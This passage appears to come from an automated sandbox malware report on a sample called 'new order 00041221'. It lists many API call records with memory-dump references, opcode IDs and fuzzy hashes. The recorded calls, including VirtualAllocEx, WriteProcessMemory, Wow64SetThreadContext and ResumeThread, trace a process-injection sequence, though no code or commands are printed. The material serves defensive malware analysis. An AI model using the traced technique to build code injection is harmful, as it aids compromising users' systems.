                                            • CreateActCtxA.KERNEL32(?), ref: 00B565B9
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.1270360353.0000000000B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_b50000_new order 00041221.jbxd
                                            Similarity
                                            • API ID: Create
                                            • String ID:
                                            • API String ID: 2289755597-0
                                            • Opcode ID: 729cfd3a787217ed71ac513f3e4d88b4057ce5a050416f01923c772c33b6ae34
                                            • Instruction ID: c8f996434127d36fb360db795b1fd8d68cf87af6b8b948b0eae14c2c4219de75
                                            • Opcode Fuzzy Hash: 729cfd3a787217ed71ac513f3e4d88b4057ce5a050416f01923c772c33b6ae34
                                            • Instruction Fuzzy Hash: 4B41B271C00719CBEB24DFA9C844BDEBBF1BF48304F6081AAD409AB255DB75594ACF50

                                            APIs
                                            • CallWindowProcW.USER32(?,?,?,?,?), ref: 04C89BA1
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.1275971377.0000000004C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C80000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_4c80000_new order 00041221.jbxd
                                            Similarity
                                            • API ID: CallProcWindow
                                            • String ID:
                                            • API String ID: 2714655100-0
                                            • Opcode ID: c29f6489932ea8d4347eeacfbda5a624af7b0232c63826844577a23127c66af5
                                            • Instruction ID: 3dd602c294f8ad9fbe291f5206111299388bd98f8b48064353e99466a8c9fadf
                                            • Opcode Fuzzy Hash: c29f6489932ea8d4347eeacfbda5a624af7b0232c63826844577a23127c66af5
                                            • Instruction Fuzzy Hash: 964138B4A00305CFDB14DF45C488AAABBF6FB88318F24845DE519AB321D374A941CBA0

                                            APIs
                                            • CreateActCtxA.KERNEL32(?), ref: 00B565B9
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.1270360353.0000000000B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_b50000_new order 00041221.jbxd
                                            Similarity
                                            • API ID: Create
                                            • String ID:
                                            • API String ID: 2289755597-0
                                            • Opcode ID: f205db7d1f36674b53bfab86a4076142db418b2a829305b3b46495d5fbedcf17
                                            • Instruction ID: 2241278a629f1f95d06859be5fe1eee423d8d644d2f4e9b65c36cb8de28679ba
                                            • Opcode Fuzzy Hash: f205db7d1f36674b53bfab86a4076142db418b2a829305b3b46495d5fbedcf17
                                            • Instruction Fuzzy Hash: 2B41E170C0071DCBEB24CFA9C844B9EBBF1BF48304F6081AAD409AB251DB75694ACF90

                                            APIs
                                            • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 06B755E8
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.1278448962.0000000006B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B70000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_6b70000_new order 00041221.jbxd
                                            Similarity
                                            • API ID: MemoryProcessWrite
                                            • String ID:
                                            • API String ID: 3559483778-0
                                            • Opcode ID: 52cc12ecf49b1387cb93f12820ac67f38e871947e4c8879e17f3e6bfbc7b7221
                                            • Instruction ID: aabe6e04d42cef22e64c8e77b85ca6120fadd594964020158db860d3950d1a46
                                            • Opcode Fuzzy Hash: 52cc12ecf49b1387cb93f12820ac67f38e871947e4c8879e17f3e6bfbc7b7221
                                            • Instruction Fuzzy Hash: 74215A76D003499FDB10CFA9C885BEEBBF1FF48310F14852AE918A7250CB789941CBA0

                                            APIs
                                            • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 06B755E8
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.1278448962.0000000006B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B70000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_6b70000_new order 00041221.jbxd
                                            Similarity
                                            • API ID: MemoryProcessWrite
                                            • String ID:
                                            • API String ID: 3559483778-0
                                            • Opcode ID: 50c197b655c7daf24a95a3dac508b8f83694de8d15d5b9e8e3d2732a1011c61f
                                            • Instruction ID: ff0b77f4c0b167756ab58e2811fe8b14b4e5d07314e542fe0102f509bef61261
                                            • Opcode Fuzzy Hash: 50c197b655c7daf24a95a3dac508b8f83694de8d15d5b9e8e3d2732a1011c61f
                                            • Instruction Fuzzy Hash: 97213B71D003499FDB10DFA9C845BDEBBF5FF48310F108529E918A7240CB799941CBA4

                                            APIs
                                            • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 06B756C8
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.1278448962.0000000006B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B70000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_6b70000_new order 00041221.jbxd
                                            Similarity
                                            • API ID: MemoryProcessRead
                                            • String ID:
                                            • API String ID: 1726664587-0
                                            • Opcode ID: fddd6e2fdb56585f8a06332f1c6021d80d9f64e8402e88ba3b0ba377c856214f
                                            • Instruction ID: 665c29f4ac88cf241206a3ea36634f8463d602a709d6d96eb10e173e5935007e
                                            • Opcode Fuzzy Hash: fddd6e2fdb56585f8a06332f1c6021d80d9f64e8402e88ba3b0ba377c856214f
                                            • Instruction Fuzzy Hash: 38214C75C003499FDB10DF99C841BEEBBF1FF48310F108429E518A7250CB359941DBA5

                                            APIs
                                            • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06B7543E
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.1278448962.0000000006B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B70000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_6b70000_new order 00041221.jbxd
                                            Similarity
                                            • API ID: ContextThreadWow64
                                            • String ID:
                                            • API String ID: 983334009-0
                                            • Opcode ID: 1ee511f68af215dc54db0860342f7cd3fcb8894a992814aecec78bc12751f308
                                            • Instruction ID: c87949742cbaa1a40981bbe3eed757fbafbea8c6d0ceaee755452ea2caff0c6b
                                            • Opcode Fuzzy Hash: 1ee511f68af215dc54db0860342f7cd3fcb8894a992814aecec78bc12751f308
                                            • Instruction Fuzzy Hash: 2E217C71D003098FDB20DFAAC485BEEBBF0EF48320F148429D559A7240CB789945CFA1
                                            APIs
                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 04C83027
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.1275971377.0000000004C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C80000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_4c80000_new order 00041221.jbxd
                                            Similarity
                                            • API ID: DuplicateHandle
                                            • String ID:
                                            • API String ID: 3793708945-0
                                            • Opcode ID: 278eec3cebc45e1abdc1ba2dc83a0ebc22b4aa10db741b045e298ca0b7222bbb
                                            • Instruction ID: c6b5017c7d036f5ab0407a42be071ca4b56d8e1f1ab57bc5a91d9d2afb03d266
                                            • Opcode Fuzzy Hash: 278eec3cebc45e1abdc1ba2dc83a0ebc22b4aa10db741b045e298ca0b7222bbb
                                            • Instruction Fuzzy Hash: 062105B5C002489FDB11CFAAD884AEEFFF5EB48310F14845AE954A7250C379A950CFA5
                                            APIs
                                            • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 06B756C8
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.1278448962.0000000006B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B70000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_6b70000_new order 00041221.jbxd
                                            Similarity
                                            • API ID: MemoryProcessRead
                                            • String ID:
                                            • API String ID: 1726664587-0
                                            • Opcode ID: ff20f28bf5d9cedff5daf311e4c426373151664282520900bc8c78c2394825a3
                                            • Instruction ID: 8038ddc29f0e965a00d781f3f3f57ef3b2678642c8f7ccfd92298acccb5f0cc6
                                            • Opcode Fuzzy Hash: ff20f28bf5d9cedff5daf311e4c426373151664282520900bc8c78c2394825a3
                                            • Instruction Fuzzy Hash: B22128B1C003499FDB10DFAAC841BEEBBF5FF48310F508829E918A7250CB399941DBA4
                                            APIs
                                            • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06B7543E
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.1278448962.0000000006B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B70000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_6b70000_new order 00041221.jbxd
                                            Similarity
                                            • API ID: ContextThreadWow64
                                            • String ID:
                                            • API String ID: 983334009-0
                                            • Opcode ID: d147ea65c0578cc4e8ee26ef4c08c68da3c362ed8635ccded174d685da1a13b3
                                            • Instruction ID: f5e2ae2bd94fac09a1328e1286ac33c37e44d2fb44ad58d07fd3e1601f03a483
                                            • Opcode Fuzzy Hash: d147ea65c0578cc4e8ee26ef4c08c68da3c362ed8635ccded174d685da1a13b3
                                            • Instruction Fuzzy Hash: EF212971D003098FDB20DFAAC4857EEBBF4EF48324F548429D559A7240CB789945CFA5
                                            APIs
                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 04C83027
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.1275971377.0000000004C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C80000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_4c80000_new order 00041221.jbxd
                                            Similarity
                                            • API ID: DuplicateHandle
                                            • String ID:
                                            • API String ID: 3793708945-0
                                            • Opcode ID: c7e1e5eeb8f9961fc4d53ed452786fd0623385ce1f418f5e784076e3f9e92c5e
                                            • Instruction ID: 24b462c28893b1b6873f389ed55ed6bef34f8b93ae93cd156a7846514ed2b92c
                                            • Opcode Fuzzy Hash: c7e1e5eeb8f9961fc4d53ed452786fd0623385ce1f418f5e784076e3f9e92c5e
                                            • Instruction Fuzzy Hash: 6921E4B5D002489FDB10CF9AD884ADEBBF5FB48310F14841AE914A3350C375A940CFA5
                                            APIs
                                            • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06B75506
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.1278448962.0000000006B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B70000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_6b70000_new order 00041221.jbxd
                                            Similarity
                                            • API ID: AllocVirtual
                                            • String ID:
                                            • API String ID: 4275171209-0
                                            • Opcode ID: b8e10703824ce20db013d74b89388c58374990dcbc1369dbbcfc23b5dec0d8e2
                                            • Instruction ID: 87b988f4d12f15b84b394938d45d478e760965342d95ac0d748d0b09ebad54bb
                                            • Opcode Fuzzy Hash: b8e10703824ce20db013d74b89388c58374990dcbc1369dbbcfc23b5dec0d8e2
                                            • Instruction Fuzzy Hash: 812136768003499FDB20DFAAC845BEEBFF5EB48320F148419E919A7250CB35A940CFA1
                                            APIs
                                            • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,04C80D19,00000800,00000000,00000000), ref: 04C80F2A
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.1275971377.0000000004C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C80000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_4c80000_new order 00041221.jbxd
                                            Similarity
                                            • API ID: LibraryLoad
                                            • String ID:
                                            • API String ID: 1029625771-0
                                            • Opcode ID: 45b1f8c5d8e16b7a799f91df8927b90d6974ce346ac5ed253013606d8b656fb5
                                            • Instruction ID: 6d247fc391a3bdeb01c674c334e3801029ac7d83d7af0ad1def551450482765d
                                            • Opcode Fuzzy Hash: 45b1f8c5d8e16b7a799f91df8927b90d6974ce346ac5ed253013606d8b656fb5
                                            • Instruction Fuzzy Hash: BA1112B6D003498FDB20DF9AC844B9EFBF5EB48314F15842EE919A7240C375A945CFA5
                                            APIs
                                            • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,04C80D19,00000800,00000000,00000000), ref: 04C80F2A
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.1275971377.0000000004C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C80000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_4c80000_new order 00041221.jbxd
                                            Similarity
                                            • API ID: LibraryLoad
                                            • String ID:
                                            • API String ID: 1029625771-0
                                            • Opcode ID: efec684b4645a9cd27a6ae4b57a4870dd83a3444958d5737519efb3fb6c867e5
                                            • Instruction ID: a6b8aaf072efaaa7708a08aeab911f9fa6678eca1da5ac9114c80895804b8452
                                            • Opcode Fuzzy Hash: efec684b4645a9cd27a6ae4b57a4870dd83a3444958d5737519efb3fb6c867e5
                                            • Instruction Fuzzy Hash: 1A1103B6C003498FDB10DF9AC844B9EFBF5AB48310F15842EE559A7240C379A545CFA5
                                            APIs
                                            • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06B75506
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.1278448962.0000000006B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B70000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_6b70000_new order 00041221.jbxd
                                            Similarity
                                            • API ID: AllocVirtual
                                            • String ID:
                                            • API String ID: 4275171209-0
                                            • Opcode ID: a7ea94f3ae8e3abc346f5fcfec321d08c11aacfe7cab83d7d2d4395cdbcd4702
                                            • Instruction ID: 7b9d9717dc69d0a34238781c9c51438fcd8254e885eda501cf83e297344a1b11
                                            • Opcode Fuzzy Hash: a7ea94f3ae8e3abc346f5fcfec321d08c11aacfe7cab83d7d2d4395cdbcd4702
                                            • Instruction Fuzzy Hash: 3D112972C003499FDB20DFAAC845BDEBFF5EB48320F148419E515A7250CB759541CFA0
                                            APIs
• ResumeThread.KERNELBASE(000000E2), ref: 06B75372
Memory Dump Source
• Source File: 00000001.00000002.1278448962.0000000006B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B70000, based on PE: false
APIs
• FindCloseChangeNotification.KERNELBASE(?,?,?,?,?,?,?,?,04DD15D1,?,?), ref: 04DD1778
Memory Dump Source
• Source File: 00000001.00000002.1277443353.0000000004DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DD0000, based on PE: false
APIs
• ResumeThread.KERNELBASE(000000E2), ref: 06B75372
Memory Dump Source
• Source File: 00000001.00000002.1278448962.0000000006B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B70000, based on PE: false
APIs
• FindCloseChangeNotification.KERNELBASE(?,?,?,?,?,?,?,?,04DD15D1,?,?), ref: 04DD1778
Memory Dump Source
• Source File: 00000001.00000002.1277443353.0000000004DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DD0000, based on PE: false
APIs
• GetModuleHandleW.KERNELBASE(00000000), ref: 04C80C9E
Memory Dump Source
• Source File: 00000001.00000002.1275971377.0000000004C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C80000, based on PE: false
APIs
• PostMessageW.USER32(?,?,?,?), ref: 06B783BD
Memory Dump Source
• Source File: 00000001.00000002.1278448962.0000000006B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B70000, based on PE: false
APIs
• PostMessageW.USER32(?,?,?,?), ref: 06B783BD
Memory Dump Source
• Source File: 00000001.00000002.1278448962.0000000006B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B70000, based on PE: false
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.1278448962.0000000006B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B70000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_6b70000_new order 00041221.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: e676dff1756bc8270ecbd10d68d9bb26d276dad286bce0c3676ac2958ffd41f7
                                            • Instruction ID: 485cede0f8aa50d3e9df8fd8f7b0219e38c7107e5a8ea064189c22d86bd06a99
                                            • Opcode Fuzzy Hash: e676dff1756bc8270ecbd10d68d9bb26d276dad286bce0c3676ac2958ffd41f7
                                            • Instruction Fuzzy Hash: 545108B0E006198FDB14CFA9C5845AEFBF2BF89304F2481AAD818A7355D7359941DFA1
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.1278448962.0000000006B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B70000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_6b70000_new order 00041221.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: ba1b1f8416197fc1eaf6c2fa4a309159a91975666d394378a2485dfa36c9a4d2
                                            • Instruction ID: 743b0daac0779dbe37dff4150479114b98f327b004ed9791d46e262f58127098
                                            • Opcode Fuzzy Hash: ba1b1f8416197fc1eaf6c2fa4a309159a91975666d394378a2485dfa36c9a4d2
                                            • Instruction Fuzzy Hash: 44510BB4E002198FDB14CFA9C5805AEBBF2FF89301F24C1AAD418A7355D7349942CFA1
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.1278448962.0000000006B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B70000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_6b70000_new order 00041221.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: d5a6debee4f24e0381846c0a7f9390ae145dde4a09b98b25b5da7ac3f267e9bf
                                            • Instruction ID: eb49059a35215d04a6d90380fc49b40a628644138f82421c73753ae8a560c838
                                            • Opcode Fuzzy Hash: d5a6debee4f24e0381846c0a7f9390ae145dde4a09b98b25b5da7ac3f267e9bf
                                            • Instruction Fuzzy Hash: 7651FA70E006198BDB14CFA9C5805AEFBF2FF89205F1481AAD418A7355D7349D41CFA1

                                            Execution Graph

                                            Execution Coverage:14.2%
                                            Dynamic/Decrypted Code Coverage:100%
                                            Signature Coverage:0%
                                            Total number of Nodes:11
                                            Total number of Limit Nodes:2

                                            Control-flow Graph

                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3716159141.0000000005A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A30000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_5a30000_new order 00041221.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 0ae62008e8443651f0e4ce56113475bccbc871ca67568a7c0478c9cda554463a
                                            • Instruction ID: a778545d6548cb4b0d9b876b8eb422c2c0664224504521d7558f1d2dcd782230
                                            • Opcode Fuzzy Hash: 0ae62008e8443651f0e4ce56113475bccbc871ca67568a7c0478c9cda554463a
                                            • Instruction Fuzzy Hash: 18F1E474E00218CFDB14DFA9D984B9EBBB2BF88304F5481A9E448AB395DB719D85CF50
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3710367617.0000000001270000.00000040.00000800.00020000.00000000.sdmp, Offset: 01270000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1270000_new order 00041221.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: e31e712eb587f2e264e8125d2853337bddb26c50cbcad3bcd15ea04c0bb1170e
                                            • Instruction ID: 34f0fb5d0e218167eadf86e02bd4d6a6fe4b1b9def183d925a89e7245e14f0a7
                                            • Opcode Fuzzy Hash: e31e712eb587f2e264e8125d2853337bddb26c50cbcad3bcd15ea04c0bb1170e
                                            • Instruction Fuzzy Hash: 60827C31A1020ADFCB15CFA8C984AAFBBF2FF88320F198559E5059B2A5D731E941CB51

                                            Control-flow Graph

                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3710367617.0000000001270000.00000040.00000800.00020000.00000000.sdmp, Offset: 01270000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1270000_new order 00041221.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: d1e7d21f4d1eef3971a6095249676138449045943c453070e0fdb67976b3508c
                                            • Instruction ID: c25787a88c60c3b73b943fccdc3cf143a2db7d375c09cf7c2b994013ee0c3912
                                            • Opcode Fuzzy Hash: d1e7d21f4d1eef3971a6095249676138449045943c453070e0fdb67976b3508c
                                            • Instruction Fuzzy Hash: 4C52B432E14763CFC7A5CF34C88A29BBBB1BF5532071885AFD4868A506E7349811CB97
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3710367617.0000000001270000.00000040.00000800.00020000.00000000.sdmp, Offset: 01270000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1270000_new order 00041221.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 5c26ca434c0800a16efb26719680e6669fa1b8ad169f57aa8910915bbeef8b9b
                                            • Instruction ID: 6822351aa9b4b22dc01648e14fc79778e5304ee08f53e17e4b868beb4d9e356d
                                            • Opcode Fuzzy Hash: 5c26ca434c0800a16efb26719680e6669fa1b8ad169f57aa8910915bbeef8b9b
                                            • Instruction Fuzzy Hash: 6812AF70A1061A8FEB15DF69D854BAEBBF6FF88300F108529E506DB395DB309D42CB90

                                            Control-flow Graph

                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3710367617.0000000001270000.00000040.00000800.00020000.00000000.sdmp, Offset: 01270000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1270000_new order 00041221.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 56b7e31b6e1ad2f063b3a1a929cdd14c1b8bdd61b6a2d357d5b7ec0339c29644
                                            • Instruction ID: b950a680c111b1934c6ae24258ab8be2fcc61cced6c936ae8b035497393759ab
                                            • Opcode Fuzzy Hash: 56b7e31b6e1ad2f063b3a1a929cdd14c1b8bdd61b6a2d357d5b7ec0339c29644
                                            • Instruction Fuzzy Hash: F1126C30A1021ADFDB15CF69D888AAEBBF6FF88300F158469E915EB265D730ED41CB50

                                            Control-flow Graph

                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3710367617.0000000001270000.00000040.00000800.00020000.00000000.sdmp, Offset: 01270000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1270000_new order 00041221.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 644d9de4d56a6d305e8291e2fd04a0c9a3a7510caa06119e34c054e5d1cd2d66
                                            • Instruction ID: 303fdb1f87c7bc7dc94189633be10e8e7161db3f4b532bb1ec58a0b674a5defd
                                            • Opcode Fuzzy Hash: 644d9de4d56a6d305e8291e2fd04a0c9a3a7510caa06119e34c054e5d1cd2d66
                                            • Instruction Fuzzy Hash: 6FA11774E14219CFDB14DFB9D884A9EBBF2BF89310F14806AE909AB361DB309941CF51
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3710367617.0000000001270000.00000040.00000800.00020000.00000000.sdmp, Offset: 01270000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1270000_new order 00041221.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 7d7d8048fbdf47890295acf94aae801ba01f8073d8f964e122e74ba3b32613a2
                                            • Instruction ID: 735bcbb23fd7857c8f4c24eb022182dfbeb358e42c620a35ef4dc58679a57e38
                                            • Opcode Fuzzy Hash: 7d7d8048fbdf47890295acf94aae801ba01f8073d8f964e122e74ba3b32613a2
                                            • Instruction Fuzzy Hash: 8891C574E10218DFDB14DFAAD884A9EFBF2BF89310F148069E809AB365DB349945CF10
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3710367617.0000000001270000.00000040.00000800.00020000.00000000.sdmp, Offset: 01270000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1270000_new order 00041221.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 05b383ff2bcdf3f97e6291238b4a442e31a3b804eef0039bd50d4f9b754a4f18
                                            • Instruction ID: 3df3122df9015fedd0fcebae13ded3aaed691a667a2551b43d421f1d5e19d456
                                            • Opcode Fuzzy Hash: 05b383ff2bcdf3f97e6291238b4a442e31a3b804eef0039bd50d4f9b754a4f18
                                            • Instruction Fuzzy Hash: DA81E874E10219CFDB14DFAAD844A9EBBF2BF89300F14C06AE419AB365DB309945CF51
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3710367617.0000000001270000.00000040.00000800.00020000.00000000.sdmp, Offset: 01270000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1270000_new order 00041221.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: dd83d3f2e572162a72ef8d8434fe2939de1009692ef0e4c94186c2efb81f3bec
                                            • Instruction ID: ac2beaed3b9a2f429206c9c3d58bf25fc8e621ac68c97af2b49087f027dde072
                                            • Opcode Fuzzy Hash: dd83d3f2e572162a72ef8d8434fe2939de1009692ef0e4c94186c2efb81f3bec
                                            • Instruction Fuzzy Hash: B881E874E10219CFEB14DFAAD884A9EBBF2BF88300F14D069E519AB365DB709941CF50
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3710367617.0000000001270000.00000040.00000800.00020000.00000000.sdmp, Offset: 01270000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1270000_new order 00041221.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 88d2b0209e9a423a0d5846927fbe78b170a50619be8fa210eb3eaace84bda1d7
                                            • Instruction ID: e6fda60daee0a69cab31803fb0fed5e85226b4f22e5ba98552caf7323e95d7e4
                                            • Opcode Fuzzy Hash: 88d2b0209e9a423a0d5846927fbe78b170a50619be8fa210eb3eaace84bda1d7
                                            • Instruction Fuzzy Hash: 7881C574E10218DFEB14DFAAD844A9EBBF2BF88310F14C069E819AB365DB309945CF50
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3710367617.0000000001270000.00000040.00000800.00020000.00000000.sdmp, Offset: 01270000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1270000_new order 00041221.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 947d403e7c005151db05c8bbbad835953996d5f1e9ebe635c126be48d8627ac0
                                            • Instruction ID: 4b0df5debfda775cb5462e5c01e15d80e20a245a9e3d827674b8686e97ae7e78
                                            • Opcode Fuzzy Hash: 947d403e7c005151db05c8bbbad835953996d5f1e9ebe635c126be48d8627ac0
                                            • Instruction Fuzzy Hash: 2681C574E10218DFDB14DFAAD854A9EBBF2FF88310F148169E819AB365DB706941CF10
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3710367617.0000000001270000.00000040.00000800.00020000.00000000.sdmp, Offset: 01270000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1270000_new order 00041221.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 55a96ef17941e69e29beac19c1a8a1cf27d496001066d91c29f3f1acf71b5c56
                                            • Instruction ID: df4c3ee7f721556bd153f87469ffc9e5054e8dddf20b9fe20e901841f662dda2
                                            • Opcode Fuzzy Hash: 55a96ef17941e69e29beac19c1a8a1cf27d496001066d91c29f3f1acf71b5c56
                                            • Instruction Fuzzy Hash: 0681B474E10218CFEB14DFAAD944A9EFBF2BF88310F148169E919AB365DB309945CF50
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3710367617.0000000001270000.00000040.00000800.00020000.00000000.sdmp, Offset: 01270000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1270000_new order 00041221.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: e834231231176451566fabbacd11e785bc8abfd083aaed7dbb727f10ebea70bb
                                            • Instruction ID: c29c3c307c69da73ff017a7f695b6394059fa14a8a8835df9c077f89d9aa0517
                                            • Opcode Fuzzy Hash: e834231231176451566fabbacd11e785bc8abfd083aaed7dbb727f10ebea70bb
                                            • Instruction Fuzzy Hash: 1281D574E10219DFEB14DFAAD944A9EBBF2BF88310F14C069E919AB365DB309941CF50
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3710367617.0000000001270000.00000040.00000800.00020000.00000000.sdmp, Offset: 01270000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1270000_new order 00041221.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 8916926dae253b85b7ca185b307348fc9dd5c14501bc126f06957ad7f3c1a629
                                            • Instruction ID: fcbee928d2c914e0177d44e16aa3fcf62a39c0e2c4bb563f4af73702a512e7b9
                                            • Opcode Fuzzy Hash: 8916926dae253b85b7ca185b307348fc9dd5c14501bc126f06957ad7f3c1a629
                                            • Instruction Fuzzy Hash: 3551C874E10208DFDB18DFAAD854A9EBBB2FF89300F24D169E915AB364DB305842CF14
